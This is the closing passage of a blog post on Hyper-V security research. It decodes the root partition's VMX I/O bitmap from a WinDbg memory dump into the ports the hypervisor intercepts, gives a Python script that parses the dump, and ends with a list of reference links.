<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For instance, you can see that for the guest partition the hypervisor intercepts every port I/O instruction (Unconditional I/O exiting is set in CPU_BASED_VM_EXEC_CONTROL), whereas for the root partition it intercepts only the ports whose bits are set in the I/O bitmaps (Use I/O bitmaps is set, and IO_BITMAP_A and IO_BITMAP_B point to the two bitmap pages: A covers ports 0000h-7FFFh, B covers 8000h-FFFFh, one bit per port). The root partition's bitmap A can be read straight from physical memory:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dc 0x4e06000 L250 - IO_BITMAP_A </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06000 00000000 00000003 00000000 00000010 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06010 00000000 00000003 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06020 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06190 00000000 00000000 00000000 f1000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bit n of the bitmap corresponds to port n, and !dc prints little-endian dwords, so the non-zero bytes are 03h at offset 4, 10h at offset 0Ch, 03h at offset 14h and F1h at offset 19Fh. Assuming the lines elided from the dump are all zero, the ports the root partition is intercepted on are therefore 20h, 21h, 64h, A0h, A1h, CF8h, CFCh, CFDh, CFEh and CFFh: the command and data ports of the master and slave 8259 PICs, the i8042 keyboard-controller command/status port, and the PCI configuration address and data ports.</span></div>
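<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Because !dc prints little-endian dwords, converting a bitmap to port numbers by hand is easy to get wrong by a nibble or a byte. The following Python script is an added example, not code from the original post: it parses !dc output back into the bytes of the bitmap page, lists every port whose intercept bit is set (pass first_port=0x8000 for IO_BITMAP_B), and annotates the well-known legacy ports. The sample dump is constructed from the four lines shown above; treating the elided lines as all-zero is an assumption.</span></div>

```python
"""Decode a VMX I/O bitmap page from a WinDbg !dc dump into port numbers.

Added example (not code from the original post). In the VMX I/O bitmaps bit n
of IO_BITMAP_A selects port n (0000h-7FFFh) and bit n of IO_BITMAP_B selects
port 8000h+n; a set bit makes IN/OUT on that port cause a VM exit. !dc prints
little-endian dwords, so each dword is turned back into bytes before the bit
index is computed. SAMPLE_DUMP is constructed from the dump lines shown in
the post; the lines elided there are assumed to be zero.
"""
import re

SAMPLE_DUMP = """\
# 4e06000 00000000 00000003 00000000 00000010 ................
# 4e06010 00000000 00000003 00000000 00000000 ................
# 4e06020 00000000 00000000 00000000 00000000 ................
# 4e06190 00000000 00000000 00000000 f1000000 ................
"""

# Standard PC/AT legacy port assignments, used only to label the result.
KNOWN_PORTS = {
    0x20: "8259A master PIC command", 0x21: "8259A master PIC data",
    0xA0: "8259A slave PIC command", 0xA1: "8259A slave PIC data",
    0x60: "i8042 keyboard controller data",
    0x64: "i8042 keyboard controller command/status",
    0xCF8: "PCI CONFIG_ADDRESS", 0xCFC: "PCI CONFIG_DATA",
    0xCFD: "PCI CONFIG_DATA+1", 0xCFE: "PCI CONFIG_DATA+2", 0xCFF: "PCI CONFIG_DATA+3",
}

# Matches "# 4e06000 00000000 ..." as well as the 64-bit "00000000`04e06000 ..." form.
DC_LINE = re.compile(r"^#?\s*([0-9a-fA-F`]+)\s+((?:[0-9a-fA-F]{8}(?:\s+|$))+)")


def parse_dc(dump, base_pa, size=0x1000):
    """Rebuild the bytes of one page from !dc output that starts at base_pa.

    Lines that are not dump lines (prompts, '...' elisions) are skipped and
    bytes not covered by any line stay zero, so a partial dump decodes to a
    subset of the real intercept list rather than to garbage.
    """
    page = bytearray(size)
    for line in dump.splitlines():
        m = DC_LINE.match(line.strip())
        if not m:
            continue
        offset = int(m.group(1).replace("`", ""), 16) - base_pa
        for dword in m.group(2).split():
            if 0 <= offset and offset + 4 <= size:
                page[offset:offset + 4] = int(dword, 16).to_bytes(4, "little")
            offset += 4
    return bytes(page)


def intercepted_ports(bitmap, first_port=0):
    """Return the ports whose bit is set; use first_port=0x8000 for IO_BITMAP_B."""
    ports = []
    for index, byte in enumerate(bitmap):
        for bit in range(8):
            if (byte >> bit) & 1:
                ports.append(first_port + index * 8 + bit)
    return ports


def describe(ports):
    """Pair each port with its legacy assignment, or 'unknown'."""
    return [(port, KNOWN_PORTS.get(port, "unknown")) for port in ports]


if __name__ == "__main__":
    bitmap_a = parse_dc(SAMPLE_DUMP, 0x4E06000)
    for port, what in describe(intercepted_ports(bitmap_a)):
        print(f"port {port:04X}h  {what}")
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dumping the full page (L400 dwords) instead of L250 and feeding the whole output to parse_dc removes the all-zero assumption; the same call with base 0x4e07000 and first_port=0x8000 decodes IO_BITMAP_B.</span></div>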
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Closing</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This article has described the steps needed to set up an environment for Hyper-V research and has very briefly covered some aspects of how the hypervisor works. I hope this information is useful to beginners in Microsoft hypervisor security research.</span></div>
<span style="font-family: "calibri"; font-size: x-small;">Files: <a href="https://drive.google.com/file/d/0B8WEjIxRncDRX1RHc0FQMmozOTg">https://drive.google.com/file/d/0B8WEjIxRncDRX1RHc0FQMmozOTg</a></span><br />
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Sources: </span><br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff540654(v=vs.85).aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://msdn.microsoft.com/en-us/library/Windows/hardware/ff540654(v=vs.85).aspx</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://msdn.microsoft.com/en-us/library/cc768520%28v=bts.10%29.aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://msdn.microsoft.com/en-us/library/cc768520%28v=bts.10%29.aspx</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://en.community.dell.com/techcenter/virtualization/w/wiki/3029.aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://en.community.dell.com/techcenter/virtualization/w/wiki/3029.aspx</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://freevirtualserialports.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://freevirtualserialports.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://ww.osronline.com/showthread.cfm?link=234398" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://ww.osronline.com/showthread.cfm?link=234398</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://download.microsoft.com/download/A/B/4/AB43A34E-BDD0-4FA6-BDEF-79EEF16E880B/Hypervisor%20Top%20Level%20Functional%20Specification%20v4.0.docx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://download.microsoft.com/download/A/B/4/AB43A34E-BDD0-4FA6-BDEF-79EEF16E880B/Hypervisor%20Top%20Level%20Functional%20Specification%20v4.0.docx</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://alter.org.ua/docs/nt_kernel/procaddr/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://alter.org.ua/docs/nt_kernel/procaddr/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.osronline.com/showthread.cfm?link=132065" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://www.osronline.com/showthread.cfm?link=132065</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://blog.cr4.sh/2012/07/vmware-gdb-stub-ida.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://blog.cr4.sh/2012/07/vmware-gdb-stub-ida.html</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="color: #0563c1;">The NT Insider (July-Aug 2015)</span></div>
</li>
</ol>
</b></div>
Gerhart X, http://www.blogger.com/profile/13830158514949395797